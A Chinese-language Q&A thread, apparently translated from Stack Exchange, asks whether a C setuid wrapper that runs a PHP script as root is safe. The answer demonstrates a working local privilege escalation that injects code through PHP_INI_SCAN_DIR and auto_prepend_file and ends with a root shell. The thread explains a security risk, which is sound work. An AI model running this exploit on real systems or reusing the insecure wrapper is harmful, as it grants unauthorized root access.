以下 setuid 程序是否存在安全风险?

n00*_*b32 1 security php setuid

我在 .c 中将以下程序设置为 setuid chmod 仅由所有者读取/执行,并将其设置为不可变的,就像它调用的 php 脚本一样。

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char *argv[] )
{
   setuid( 0 );
   execv( "/var/tools/control.php", argv );

   return 0;
}
Run Code Online (Sandbox Code Playgroud)

这本身是否存在安全风险?是否可以通过 argv 或其他一些我没有想到的东西来推送其他命令?我不只是询问这个代理程序的 php 脚本。

Mat*_*Ife 6

是的,这是一个安全风险。

$ cat <<EOF >/tmp/php.ini
auto_prepend_file=/tmp/owned.php
EOF

$ cat <<EOF >/tmp/owned.php
<?php
echo "Owned\n";
pcntl_exec("/usr/bin/sudo", array("sudo", "-i"));
?>
EOF

$ export PHP_INI_SCAN_DIR="/tmp"
$ /path/to/the/setuid/wrapper
Owned
# id
uid=0(root) gid=0(root) groups=0(root) context=staff_u:sysadm_r:sysadm_t:s0-s0:c0.c1023
Run Code Online (Sandbox Code Playgroud)

这就是为什么您应该避免使用 setuid 二进制文件的原因。